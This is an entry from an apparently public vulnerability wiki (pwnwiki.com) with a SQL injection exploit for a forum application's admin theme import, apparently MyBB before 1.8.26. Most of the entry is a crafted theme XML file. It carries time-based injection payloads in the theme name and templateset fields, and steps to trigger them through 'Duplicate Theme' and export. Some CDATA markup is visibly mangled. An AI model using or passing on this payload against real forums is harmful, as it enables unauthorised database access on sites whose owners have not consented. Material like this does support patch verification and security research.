免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
Affected Versions
< 1.8.26
Exploit
Import the constructed malicious xml in the backend theme manager
<?xml version="1.0" encoding="UTF-8"?>
<theme name="1' and sleep(10) and '" version="1825">
<properties>
<templateset>-2' or sleep(0.01) or '</templateset>
<editortheme><!CDATAmybb.css></editortheme>
<imgdir><!CDATAimages></imgdir>
<logo><!CDATAimages/logo.png></logo>
<tablespace><!CDATA5></tablespace>
<borderwidth><!CDATA0></borderwidth>
<color><!CDATA></color>
<disporder><!CDATAa:7:{s:10:"global.css";i:1;s:10:"usercp.css";i:2;s:9:"modcp.css";i:3;s:16:"star_ratings.css";i:4;s:14:"showthread.css";i:5;s:17:"thread_status.css";i:6;s:8:"css3.css";i:7;}></disporder>
</properties>
<stylesheets>
</stylesheets>
<templates>
</templates>
</theme>
Click "Duplicate Theme", then capture the traffic, successfully implemented delayed injection (the injection will also exist in the export function)
PWNWIK.COM==免费、自由、人人可编辑的漏洞库
